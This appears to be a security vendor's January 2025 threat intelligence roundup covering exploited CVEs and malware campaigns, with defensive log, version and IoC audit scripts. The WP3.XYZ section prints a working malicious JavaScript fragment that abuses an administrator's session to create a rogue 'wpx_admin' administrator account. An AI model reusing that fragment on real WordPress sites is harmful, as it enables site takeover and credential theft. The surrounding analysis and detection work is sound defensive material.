CVE-2024-55591: 50,000 Internet-Facing Devices Affected by Fortinet Vulnerability

Welcome to Picus Security's monthly cyber threat intelligence roundup! 

Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.

Our Picus CTI platform will enable you to identify threats targeting your region, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.

Latest Vulnerabilities and Exploits in January 2025

In this section, we will provide information on the latest vulnerabilities and exploits being targeted by adversaries in the wild, the affected products, and the available patches.

CVE-2024-55591: CISA Adds Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability to KEV Catalog

  • Affected Vendor: Fortinet

  • Affected Products:

      • FortiOS (versions 7.0.0–7.0.16)

      • FortiProxy (versions 7.0.0–7.0.19, 7.2.0–7.2.12)

  • CVE:

      • CVE-2024-55591 – Authentication bypass via the Node.js websocket module

  • Fixes:

      • FortiOS: Update to version 7.0.17 or later
      • FortiProxy: Update to version 7.2.13 or later, or 7.0.20 or later
      • Workarounds: Remove public exposure of management interfaces or restrict access to trusted internal users.

On January 14, 2025, Fortinet issued a security advisory for CVE-2024-55591, a critical authentication bypass vulnerability in FortiOS (versions 7.0.0–7.0.16) and FortiProxy (versions 7.0.0–7.0.19 and 7.2.0–7.2.12). The flaw, exploited in the wild since November 2024, is an authentication bypass using an alternate path or channel: attackers sent crafted requests to the Node.js websocket module and obtained super-admin access, which let them modify firewall configurations, create accounts, and steal credentials.

Researchers documented the campaign's phases: scanning, admin logins, account hijacking, and lateral movement, with roughly 48,000 internet-facing devices affected globally (see Figure 1). Although CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on January 14, 2025, with a remediation deadline of January 21, 2025, many organizations remain exposed.

What to do next?

Admins should upgrade to FortiOS 7.0.17+ or FortiProxy 7.2.13+ and restrict management interfaces to trusted networks. Where patching must wait, disconnect management interfaces from public access. Monitoring for indicators of compromise, in particular unexpected admin logins from VPS hosting providers, is critical.

Figure 1: 48,000 Internet-Facing Devices Vulnerable to CVE-2024-55591 by ShadowServer
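The monitoring advice above translates directly into a log review: flag successful administrator logins whose source address is outside the networks administrators actually use, and flag any event that adds a new administrator account. The script below is an added example, not code from Picus or Fortinet. The log lines are constructed to follow the FortiOS key=value event format; the field names it relies on (logdesc, srcip, cfgpath, cfgobj, action) are assumptions about that format, and every address and user name in the sample is invented.

```python
"""Review FortiOS event logs for the post-exploitation activity described
above: administrator logins from outside the trusted management networks and
the creation of new administrator accounts.

Added example, not code from Picus or Fortinet. Log lines are constructed in
the FortiOS key=value style; field names are assumptions about that format.
"""
import ipaddress
import re
from dataclasses import dataclass

# Assumption: legitimate administration only ever originates from these ranges.
TRUSTED_MGMT_NETS = (
    ipaddress.ip_network("10.10.0.0/16"),
    ipaddress.ip_network("192.168.50.0/24"),
)

# key=value pairs; values may be double-quoted and contain spaces.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Finding:
    line_no: int
    reason: str
    user: str
    srcip: str


def parse_fortios_line(line: str) -> dict:
    """Turn one FortiOS key=value log line into a dict, stripping quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def is_trusted(ip_str: str, nets=TRUSTED_MGMT_NETS) -> bool:
    """True when ip_str is a valid address inside one of the trusted networks."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return False  # a missing or malformed srcip is never treated as trusted
    return any(ip in net for net in nets)


def review_admin_activity(lines, nets=TRUSTED_MGMT_NETS):
    """Return a Finding for every suspicious system event in `lines`."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_fortios_line(line)
        if ev.get("type") != "event" or ev.get("subtype") != "system":
            continue  # only system events carry admin logins and config changes
        src = ev.get("srcip", "")
        if ev.get("logdesc") == "Admin login successful" and not is_trusted(src, nets):
            findings.append(Finding(n, "admin login from outside trusted management networks",
                                    ev.get("user", "?"), src))
        if ev.get("cfgpath") == "system.admin" and ev.get("action") == "Add":
            findings.append(Finding(n, "new administrator account created",
                                    ev.get("cfgobj", "?"), src))
    return findings


# Constructed sample: one normal login, one login from an untrusted address
# followed by an admin account being added, and an unrelated VPN event.
SAMPLE_LOGS = [
    'date=2025-01-15 time=09:02:11 type=event subtype=system level=information vd=root '
    'logdesc="Admin login successful" user=admin ui=https(10.10.4.20) method=https '
    'srcip=10.10.4.20 dstip=10.10.0.1 action=login status=success '
    'msg="Administrator admin logged in successfully from https(10.10.4.20)"',
    'date=2025-01-15 time=03:17:45 type=event subtype=system level=information vd=root '
    'logdesc="Admin login successful" user=admin ui=https(203.0.113.77) method=https '
    'srcip=203.0.113.77 dstip=198.51.100.10 action=login status=success '
    'msg="Administrator admin logged in successfully from https(203.0.113.77)"',
    'date=2025-01-15 time=03:18:02 type=event subtype=system level=information vd=root '
    'logdesc="Object configured" user=admin ui=https(203.0.113.77) srcip=203.0.113.77 '
    'action=Add cfgtid=1234 cfgpath=system.admin cfgobj=support_tmp msg="Add system.admin support_tmp"',
    'date=2025-01-15 time=10:00:00 type=event subtype=vpn level=information vd=root '
    'logdesc="SSL VPN tunnel up" user=jdoe srcip=198.51.100.23 action=tunnel-up',
]

if __name__ == "__main__":
    for f in review_admin_activity(SAMPLE_LOGS):
        print(f"line {f.line_no}: {f.reason} (user={f.user}, srcip={f.srcip})")
```

Run against the sample, the first login is ignored because it comes from a trusted range, while the 03:17 login from a TEST-NET address and the account added a few seconds later are both reported. Feed real exported logs in as `lines` and adjust `TRUSTED_MGMT_NETS` to the ranges your administrators use; any hit on a device that was exposed during the exploitation window deserves a full account and configuration review, not just a patch.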

CVE-2025-21333, CVE-2025-21334 & CVE-2025-21335: Microsoft Hyper-V Zero-Day Vulnerabilities Added to CISA KEV Catalog

Microsoft’s January 2025 security update addresses 161 vulnerabilities, including three critical zero-day flaws in Hyper-V’s NT Kernel Integration VSP (CVE-2025-21333, CVE-2025-21334, and CVE-2025-21335), which have been added to CISA's Known Exploited Vulnerabilities catalog.

These privilege escalation flaws, with a CVSS score of 7.8, allow attackers to gain SYSTEM-level privileges, potentially as part of post-compromise activity. The vulnerabilities affect Hyper-V's Virtualization Service Provider (VSP), a vital component enabling child partitions to interact with synthetic devices.

Microsoft has released patches as part of the January 2025 Security Update to mitigate these actively exploited vulnerabilities, and they should be applied promptly. Federal agencies are required to implement the fixes by February 4, 2025. For more details and to download the patches, refer to Microsoft's official security update guide entries for the three CVEs.

CISA Adds Yet Another BeyondTrust Vulnerability to KEV Catalog Following Treasury Breach

  • Affected Vendor: BeyondTrust

  • Affected Products: Privileged Remote Access (PRA), Remote Support (RS)

  • CVEs & Available Fixes:

    • CVE-2024-12686: Command injection vulnerability. Patch available for PRA and RS versions 22.1.x and higher.

    • CVE-2024-12356: Critical command injection vulnerability. Patch available for PRA and RS versions 22.1.x and higher.

CISA has added a second vulnerability in BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) products to its Known Exploited Vulnerabilities catalog. This vulnerability, identified as CVE-2024-12686, is a medium-severity command injection flaw that allows attackers with existing administrative privileges to execute operating system commands as the site user. BeyondTrust has released patches for all supported versions of PRA and RS 22.1.x and higher to address this issue.

This addition follows a previous inclusion of another critical command injection vulnerability, CVE-2024-12356, affecting the same products. Both vulnerabilities were discovered during an investigation into a cyber incident in early December 2024, where attackers exploited these flaws to breach certain systems, including the U.S. Treasury Department. 

CISA strongly urges all organizations to prioritize timely remediation of these vulnerabilities to reduce exposure to potential cyberattacks. Federal agencies are required to apply the necessary patches by February 3, 2025, to secure their networks against active threats. 

For detailed information on the vulnerabilities and available patches, please refer to BeyondTrust's security advisories.

CVE-2020-11023: CISA Flags XSS Vulnerability in jQuery for Active Exploitation

CVE-2020-11023 is a cross-site scripting (XSS) vulnerability in jQuery versions 1.0.3 to 3.4.1. It occurs when HTML containing untrusted <option> elements is passed to DOM manipulation methods such as .html() or .append(), allowing attackers to execute script in a user's browser. Although fixed in jQuery 3.5.0 (April 2020), it remains exploitable wherever older versions are still deployed.

CISA added this vulnerability to its KEV catalog on January 23, 2025, after evidence of active exploitation by APT groups, including Chinese state-sponsored actors. Federal agencies must patch systems by February 13, 2025. CISA recommends organizations update to jQuery 3.5.0+ and use tools like DOMPurify for sanitization. Exploitation highlights risks of outdated libraries in critical systems.

Figure 2. CISA Adds CVE-2020-11023 jQuery Vulnerability to Its KEV Catalog on January 23, 2025
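Because the fix is an upgrade to 3.5.0 or later, the practical first step is finding every copy of jQuery a site still serves and checking its version against the affected range. The script below is an added example, not code from Picus or the jQuery project. It relies on the version banner jQuery places at the top of its files ("jQuery v3.4.1" in minified builds, "jQuery JavaScript Library v1.12.4" in unminified ones); the paths and file contents in SAMPLE_FILES are constructed for the demonstration.

```python
"""Find copies of jQuery in a web tree that fall inside the range affected by
CVE-2020-11023: 1.0.3 up to, but not including, the fixed 3.5.0 release.

Added example, not code from Picus or the jQuery project. SAMPLE_FILES is a
constructed stand-in for a site's static files.
"""
import pathlib
import re
from typing import Optional

FIRST_AFFECTED = (1, 0, 3)
FIXED = (3, 5, 0)

# Matches both banner styles and captures the dotted version number.
BANNER_RE = re.compile(r"jQuery(?: JavaScript Library)? v(\d+\.\d+\.\d+)")


def parse_version(version: str) -> tuple:
    """'3.4.1' -> (3, 4, 1), so versions compare numerically rather than as strings."""
    return tuple(int(part) for part in version.split("."))


def extract_jquery_version(source: str) -> Optional[str]:
    """Return the version from a jQuery banner, or None if the file is not jQuery."""
    m = BANNER_RE.search(source[:512])  # the banner sits in the first few lines
    return m.group(1) if m else None


def is_affected(version: str) -> bool:
    """True when the version lies in [1.0.3, 3.5.0), i.e. predates the fix."""
    return FIRST_AFFECTED <= parse_version(version) < FIXED


def audit_jquery(files: dict) -> list:
    """files maps path -> content. Return (path, version) for every affected copy."""
    hits = []
    for path, content in files.items():
        version = extract_jquery_version(content)
        if version is not None and is_affected(version):
            hits.append((path, version))
    return sorted(hits)


def audit_directory(root: str) -> list:
    """Walk a web root on disk and audit every .js file found under it."""
    files = {str(p): p.read_text(errors="ignore")[:512]
             for p in pathlib.Path(root).rglob("*.js")}
    return audit_jquery(files)


# Constructed sample: a bundled 1.12.4, a vendored 3.4.1, a fixed 3.7.1 and a
# file that is not jQuery at all.
SAMPLE_FILES = {
    "site/wp-includes/js/jquery/jquery.js":
        "/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */\n!function(a,b){/* ... */}",
    "site/static/vendor/jquery-3.4.1.min.js":
        "/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */",
    "site/static/vendor/jquery-3.7.1.min.js":
        "/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */",
    "site/static/app.js":
        "document.querySelector('#greeting').textContent = 'hello';",
}

if __name__ == "__main__":
    for path, version in audit_jquery(SAMPLE_FILES):
        print(f"{path}: jQuery {version} is affected by CVE-2020-11023")
```

`audit_directory("/var/www/html")` does the same walk over a real document root. For a page that is already loaded, `jQuery.fn.jquery` in the browser console reports the version actually in use, which catches copies pulled from a CDN that a file scan never sees. Upgrading closes the hole in the library; the code-level habit that keeps it closed is never handing untrusted HTML to .html() or .append(), and using textContent or a sanitizer such as DOMPurify where HTML insertion is unavoidable.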

CVE-2025-24085: Apple Patches Zero-Day Vulnerability Across iOS, macOS, and More

  • Affected Vendor: Apple

  • Affected Products:

      • iPhone XS and later
      • iPad Pro, iPad Air (3rd generation and later), iPad mini (5th generation and later), iPad (7th generation and later)
      • macOS Sequoia
      • Apple Vision Pro
      • Apple TV HD and Apple TV 4K
      • Apple Watch Series 6 and later

  • CVEs:

      • CVE-2025-24085: Use-after-free vulnerability in CoreMedia
      • CVE-2025-24107: Privilege escalation to root
      • CVE-2025-24159: Kernel code execution
      • CVE-2025-24128: Safari address bar spoofing
      • CVE-2025-24137: AirPlay remote code execution
      • CVE-2025-24145: User phone number exposure via system logs

  • Fixes:

      • iOS 18.3, iPadOS 18.3, macOS Sequoia 15.3, visionOS 2.3, tvOS 18.3, watchOS 11.3

Apple has addressed CVE-2025-24085, a zero-day vulnerability affecting iPhones, iPads, macOS Sequoia Macs, Apple Vision Pro, and Apple TVs. The flaw, a use-after-free bug in the CoreMedia component, allows a malicious app to elevate privileges and gain control of the system. Apple fixed it with improved memory management in iOS 18.3, macOS Sequoia 15.3, visionOS 2.3, tvOS 18.3, and watchOS 11.3. The flaw was actively exploited against devices running iOS versions earlier than iOS 17.2.

Additional vulnerabilities, such as CVE-2025-24107 (root access), CVE-2025-24159 (kernel privileges), and CVE-2025-24128 (Safari spoofing), were also patched. Apple recommends updating affected devices immediately to prevent further exploitation.

Top Threat Actors Observed in the Wild: January 2025

Here are the most active threat actors observed in the wild in December.

IPany VPN Supply Chain Attack: SlowStepper Malware Targets South Korean Firms

  • Victim Location: South Korea, Taiwan, Hong Kong, United States, New Zealand, Japan, China

  • Sectors: Technology, VPN Provider, Semiconductor Company, Software Development, and other users of IPany VPN.

  • Threat Actor: PlushDaemon APT (China-aligned hacking group).

  • Actor Motivations: Cyber espionage, likely targeting sensitive industry data and intellectual property.

  • Malware: SlowStepper (version 0.2.10 Lite).

South Korean VPN provider IPany suffered a supply chain attack by the "PlushDaemon" hacking group, which compromised its installer to deploy the 'SlowStepper' malware [1]. Hackers infiltrated IPany's development platform, embedding a backdoor in the installer file, infecting users upon installation. Researchers identified affected victims, including a semiconductor firm and a software developer, with infections dating back to November 2023. 

SlowStepper, a stealthy tool, collects sensitive system data, spies on users, and executes commands. The trojanized installer was removed in May 2024, but those infected must clean their systems. Indicators of compromise and full details are available here.

Microsoft Teams Vishing Attacks Exploit Employees for Remote Access

  • Victim Location: Global, with a focus on organizations using Microsoft 365 subscriptions.

  • Sectors: Various, including SMBs, enterprises, and organizations relying on managed service providers (MSPs).

  • Threat Actor: STAC5143 and STAC5777 (linked to FIN7/Carbon Spider and ransomware group Storm-1811).

  • Actor Motivation: Financial gain through ransomware deployment, credential theft, and system compromise.

  • Malware: Black Basta ransomware, custom Python backdoors, and malicious DLL sideloading tools.

Security researchers have uncovered a new wave of phishing attacks targeting Microsoft Teams users [2]. Hackers, linked to ransomware groups STAC5143 and STAC5777, bombarded employees with spam emails, then posed as IT support via Teams. They tricked employees into granting remote access, leveraging tools like Microsoft Quick Assist and Teams’ built-in remote control. Using this access, attackers deployed malware, stole credentials, and installed ransomware like Black Basta.

These campaigns exploited Microsoft services for malicious file distribution, reducing detection. Researchers recommend restricting external Teams calls, limiting remote access applications, and training employees to recognize social engineering tactics. Indicators of compromise and detection methods are available in the Sophos report to help organizations mitigate these threats.

Recent Malware Attacks in January 2025

In December 2024, a variety of malware attacks were recorded, highlighting the persistent threat landscape. Below is a detailed list of the active malware incidents for the month. 

MintsLoader Campaign Spreads Malware via PowerShell and Fake CAPTCHA Prompts

  • Victim Location: United States and Europe

  • Sectors: Electricity, Oil and Gas, Legal Services

  • Threat Actor: Unknown (linked to advanced cybercrime operations)

  • Actor Motivations: Financial gain, data theft, and possibly geopolitical objectives

  • Malware: 

    • MintsLoader (PowerShell-based loader)

    • StealC (information stealer)

    • BOINC (legitimate platform abused for malicious purposes)

Researchers have uncovered a campaign using the PowerShell-based MintsLoader malware to deploy StealC information stealer and BOINC [3]. Delivered through spam emails linking to malicious pages or JavaScript files, MintsLoader evades detection via obfuscation, sandbox checks, and a Domain Generation Algorithm for command-and-control (C2) communication. It targets sectors like energy and legal services in the U.S. and Europe.

The campaign abuses fake CAPTCHA pages, tricking users into executing malicious scripts. StealC, part of a malware-as-a-service model, avoids infecting machines in certain post-Soviet states. Concurrently, updated loaders like Astolfo Loader (Jinx V3) and GootLoader exploit SEO poisoning and compromised WordPress sites to distribute malware, showcasing the evolving sophistication of cyber threats.

Murdoc_Botnet: Mirai Variant Targets AVTECH and Huawei Devices in Global Campaign

  • Victim Location: Malaysia, Thailand, Mexico, Indonesia, and globally where vulnerable devices are present.

  • Sectors: Consumer electronics, IoT devices, and industries relying on AVTECH cameras and Huawei routers.

  • Threat Actor: Unknown (linked to Mirai botnet campaigns).

  • Actor Motivations: Establishing botnets for DDoS attacks and potential monetization through malicious network control.

  • Malware: Murdoc_Botnet (a Mirai variant).

  • CVEs: 

    • CVE-2024-7029 

    • CVE-2017-17215

The Murdoc_Botnet, a Mirai variant, targets vulnerable AVTECH cameras and Huawei HG532 routers in a campaign discovered by Qualys Threat Research in July 2024 [4]. Exploiting CVE-2024-7029 and CVE-2017-17215, attackers deploy botnet samples via ELF binaries and bash scripts. The malware leverages GTFOBins to fetch, execute, and remove payloads. Over 1,300 active IPs and 100+ command-and-control servers facilitate its distribution, affecting *nix systems primarily in Malaysia, Thailand, Mexico, and Indonesia. Organizations should update firmware, monitor processes, and avoid untrusted scripts to mitigate risks from Murdoc_Botnet and similar threats.

WP3.XYZ Malware Compromises Over 5,000 WordPress Sites with Rogue Admin Accounts

The WP3.XYZ malware campaign has compromised over 5,000 WordPress sites by creating rogue admin accounts, installing a malicious plugin, and stealing sensitive data [5]. The malware uses the wp3[.]xyz domain to exfiltrate data, including admin credentials and logs, disguised as image requests. Attackers create a rogue admin account, "wpx_admin," and activate a malicious plugin downloaded from the same domain. 

// Fragment of the WP3.XYZ script as published by c/side. It runs inside the
// browser of a WordPress administrator who is already logged in, so every
// request below carries that administrator's own session cookies.
async function createUser() {
    // Load the legitimate "Add New User" page with the victim's credentials...
    const userPage = await fetch(`${window.location.origin}/wp-admin/user-new.php`, {
        credentials: 'include',
        headers: { 'Accept': 'text/html' }
    }).then(r => r.text());

    // ...and scrape the create-user nonce from it. Because the nonce is taken
    // from the victim's own page, WordPress's CSRF check is satisfied.
    const doc = new DOMParser().parseFromString(userPage, 'text/html');
    const csrfToken = doc.querySelector('input[name="_wpnonce_create-user"]')?.value;

    if (!csrfToken) {
        sendLog({ error: 'CSRF token not found', type: 'error' });
        return;
    }

    // Build the same form the admin UI would submit: the rogue "wpx_admin"
    // account with the administrator role. The password was redacted by c/side.
    const formData = new FormData();
    formData.append('_wpnonce_create-user', csrfToken);
    formData.append('user_login', 'wpx_admin');
    formData.append('pass1', '[REDACTED BY C/SIDE]');
    formData.append('pass2', '[REDACTED BY C/SIDE]');
    formData.append('role', 'administrator');

    // Submit it through the victim's session.
    const response = await fetch(`${window.location.origin}/wp-admin/user-new.php`, {
        method: 'POST',
        body: formData,
        credentials: 'include'
    });

    // sendLog() is the script's reporting routine to wp3[.]xyz; it is not
    // part of the published fragment.
    sendLog({ status: response.ok ? 'success' : 'failed', type: 'user_create' });
}

To mitigate risks, experts recommend 

  • blocking the wp3[.]xyz domain, 
  • reviewing admin accounts and plugins, 
  • enabling CSRF protections, and 
  • implementing multi-factor authentication 

to secure compromised sites and prevent further exploitation.
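The two traces this campaign leaves on a site, an administrator account nobody on the team created and theme or plugin files that reference the wp3[.]xyz domain, can be checked mechanically. The script below is an added example, not code from Picus, c/side or WordPress. The user list is a constructed CSV in the shape of `wp user list --format=csv` output and the file contents are invented; only the domain and the "wpx_admin" login come from the report above.

```python
"""Audit a WordPress installation for the traces of the WP3.XYZ campaign
described above: administrator accounts that are not on the allowlist, and
theme/plugin files that load from or report to the rogue domain.

Added example, not code from Picus, c/side or WordPress. Sample data is
constructed; the domain and login are the indicators named in the report.
"""
import csv
import io
import re

ROGUE_DOMAIN = "wp3.xyz"    # written defanged as wp3[.]xyz in the report
ROGUE_LOGIN = "wpx_admin"   # account name the campaign creates

# Matches the domain in URLs, strings and attributes, not as a suffix of
# another host name, case-insensitively.
DOMAIN_RE = re.compile(r"(?<![\w.-])" + re.escape(ROGUE_DOMAIN) + r"\b", re.IGNORECASE)


def find_rogue_admins(user_csv: str, expected_admins: set) -> list:
    """Return administrator logins that are not in expected_admins."""
    rogue = []
    for row in csv.DictReader(io.StringIO(user_csv)):
        roles = {r.strip() for r in row["roles"].split(",")}
        if "administrator" in roles and row["user_login"] not in expected_admins:
            rogue.append(row["user_login"])
    return sorted(rogue)


def find_ioc_files(files: dict) -> list:
    """files maps path -> content. Return paths referencing the domain or login."""
    hits = []
    for path, content in files.items():
        if DOMAIN_RE.search(content) or ROGUE_LOGIN in content:
            hits.append(path)
    return sorted(hits)


def audit_site(user_csv: str, expected_admins: set, files: dict) -> dict:
    """Combine both checks; an empty result on both keys means no trace found."""
    return {
        "rogue_admins": find_rogue_admins(user_csv, expected_admins),
        "ioc_files": find_ioc_files(files),
    }


# Constructed sample in the shape of `wp user list --format=csv` output.
SAMPLE_USERS_CSV = """ID,user_login,user_email,user_registered,roles
1,siteowner,owner@example.com,2021-03-02 10:00:00,administrator
4,editor_jane,jane@example.com,2022-07-19 08:30:00,editor
7,wpx_admin,wpx_admin@example.com,2025-01-12 02:13:44,administrator
"""

# Constructed sample files: an injected script tag in the theme footer,
# plus two clean files.
SAMPLE_FILES = {
    "wp-content/themes/site/footer.php":
        '<?php wp_footer(); ?>\n<script src="https://wp3.xyz/example-loader.js"></script>\n</body>',
    "wp-content/plugins/example/example.php":
        "<?php /* Plugin Name: Example Plugin */",
    "wp-content/themes/site/functions.php":
        "<?php add_action('init', 'site_setup');",
}

if __name__ == "__main__":
    result = audit_site(SAMPLE_USERS_CSV, {"siteowner"}, SAMPLE_FILES)
    print("rogue admins:", result["rogue_admins"])
    print("files referencing the campaign IoCs:", result["ioc_files"])
```

On a real site, pipe `wp user list --role=administrator --format=csv` into `find_rogue_admins` and read theme and plugin sources from disk into the `files` dict. Note what the published script shows about the mitigation list: it fetches the create-user nonce from inside the victim's own session, so the nonce alone does not stop it. Finding and removing the rogue account and the injected script, and requiring MFA for administrators, is what actually ends the compromise.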

References

[1] The Hacker News, “PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack,” The Hacker News, Jan. 22, 2025. Available: https://thehackernews.com/2025/01/plushdaemon-apt-targets-south-korean.html. [Accessed: Jan. 28, 2025]

[2] M. Parsons, C. Cowie, D. Souter, H. Neal, A. Bradshaw, and S. Gallagher, “Sophos MDR tracks two ransomware campaigns using ‘email bombing,’ Microsoft Teams ‘vishing,’” Sophos News, Jan. 21, 2025. Available: https://news.sophos.com/en-us/2025/01/21/sophos-mdr-tracks-two-ransomware-campaigns-using-email-bombing-microsoft-teams-vishing/. [Accessed: Jan. 28, 2025]

[3] The Hacker News, “MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks,” The Hacker News, Jan. 27, 2025. Available: https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html. [Accessed: Jan. 27, 2025]

[4] D. Ahmed, “New Mirai Variant Murdoc_Botnet Launches DDoS Attacks via IoT Exploits,” Hackread - Latest Cybersecurity, Tech, Crypto & Hacking News, Jan. 21, 2025. Available: https://hackread.com/mirai-variant-murdoc-botnet-ddos-attacks-iot-exploits/. [Accessed: Jan. 28, 2025]

[5] B. Toulas, “WP3.XYZ malware attacks add rogue admins to 5,000+ WordPress sites,” BleepingComputer, Jan. 14, 2025. Available: https://www.bleepingcomputer.com/news/security/wp3xyz-malware-attacks-add-rogue-admins-to-5-000-plus-wordpress-sites/. [Accessed: Jan. 28, 2025]